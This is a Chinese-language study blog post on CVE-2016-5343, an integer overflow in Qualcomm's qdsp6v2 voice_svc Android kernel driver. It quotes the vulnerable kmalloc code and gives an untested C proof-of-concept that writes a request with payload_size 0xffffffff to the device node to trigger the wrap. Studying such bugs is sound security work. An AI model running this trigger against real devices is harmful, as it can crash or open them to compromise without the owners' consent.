最近在学习android内核漏洞,写篇博做个记录,也算是所学即用。 https://www.codeaurora.org/multiple-memory-corruption-issues-write-operation-qdsp6v2-voice-service-driver-cve-2016-5343,有高通的洞也是潜力无限,漏洞定位到/msm/drivers/soc/qcom/qdsp6v2/voice_svc.c的voice_svc_send_req,可以得知write操作能触发,没有搜到这个洞的poc。看补丁,是个整数溢出:用户控制的payload_size(uint32_t)未经上界检查就直接参与分配大小的计算,以sizeof(struct apr_data)+payload_size传入kmalloc。在size_t为32位的内核上,payload_size取接近0xffffffff的值时该加法回绕,实际分配的内存远小于期望值,后续按payload_size使用该缓冲区就会越界,结果不可预期。需要注意的是,在64位内核上uint32_t会先被提升为64位的size_t再相加,并不会回绕,kmalloc只会因请求过大而失败(返回-ENOMEM),所以验证前要先确认目标内核的位数。
static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request,
			      struct voice_svc_prvt *prtd)
{
	int ret = 0;
	void *apr_handle = NULL;
	struct apr_data *aprdata = NULL;
	uint32_t user_payload_size = 0;

	pr_debug("%s ", __func__);

	if (apr_request == NULL) {
		pr_err("%s: apr_request is NULL ", __func__);
		ret = -EINVAL;
		goto done;
	}

	/* payload_size is taken from the user-supplied request as-is; no
	 * upper bound is checked before it feeds the allocation size below. */
	user_payload_size = apr_request->payload_size;

	/* Vulnerable allocation (CVE-2016-5343): the sum
	 * sizeof(struct apr_data) + user_payload_size is computed in size_t.
	 * With a 32-bit size_t a payload_size near UINT32_MAX wraps the sum and
	 * kmalloc() hands back a buffer far smaller than the caller asked for.
	 * On a 64-bit kernel the uint32_t is widened first, so the sum does not
	 * wrap and the oversized request simply fails -- confirm on the target.
	 * The remainder of the function, which uses aprdata, is not shown in
	 * this excerpt. */
	aprdata = kmalloc(sizeof(struct apr_data) + user_payload_size,
			  GFP_KERNEL);
	if (aprdata == NULL) {
		pr_err("%s: aprdata kmalloc failed. ", __func__);
		ret = -ENOMEM;
		goto done;
	}
写了个poc,尚未经验证,先记录下,后续实验过后再完善:
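#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include "voice_svc.h"

/*
 * Trigger sketch for CVE-2016-5343 (qdsp6v2 voice_svc, voice_svc_send_req):
 * send one MSG_REQUEST write whose payload_size is 0xffffffff so that the
 * driver's kmalloc(sizeof(struct apr_data) + payload_size) wraps on a 32-bit
 * kernel. Untested; the expected outcome is at most a kernel crash, not a
 * controlled exploit. Run only on a disposable test device.
 *
 * Fixes over the first sketch: open_dev() returned nothing, both message
 * pointers were NULL when dereferenced, a struct pointer was stored into a
 * payload byte, and the write length used sizeof(struct voice_svc_register)
 * although the message is a request.
 */

/* Device node name is not confirmed; adjust if the target uses another path. */
#define VOICE_SVC_DEV "/dev/msm-voice-svc"

/* Open the driver node read/write; exits the process on failure.
 * Returns the open fd; the caller is responsible for close(). */
static int open_dev(const char *dev)
{
	int fd = open(dev, O_RDWR);
	if (fd < 0) {
		fprintf(stderr, "failed to open %s\n", dev);
		exit(EXIT_FAILURE);
	}
	return fd;
}

int main(void)
{
	/* One write() carries the voice_svc_write_msg header followed by the
	 * request struct in the trailing payload array. The driver may expect
	 * payload_size bytes of data after the request header as well; that
	 * cannot be satisfied for 0xffffffff and is not attempted here. */
	const size_t req_len = sizeof(struct voice_svc_cmd_request);
	const size_t msg_len = sizeof(struct voice_svc_write_msg) + req_len;

	struct voice_svc_write_msg *msg = calloc(1, msg_len);
	if (msg == NULL) {
		perror("calloc");
		return EXIT_FAILURE;
	}
	msg->msg_type = MSG_REQUEST;

	struct voice_svc_cmd_request req;
	memset(&req, 0, sizeof req);
	/* 0xffffffff + sizeof(struct apr_data) wraps a 32-bit size_t, so the
	 * kernel allocates a buffer much smaller than the claimed payload. On a
	 * 64-bit kernel the sum does not wrap and the write should just fail. */
	req.payload_size = 0xffffffffU;
	/* assumes payload is the trailing byte array of voice_svc_write_msg
	 * (the first sketch indexed payload[0]) -- confirm against voice_svc.h */
	memcpy(msg->payload, &req, req_len);

	int fd = open_dev(VOICE_SVC_DEV);

	ssize_t n = write(fd, msg, msg_len);
	if (n < 0) {
		perror("write");
	} else {
		printf("write returned %zd\n", n);
	}

	close(fd);
	free(msg);
	return 0;
}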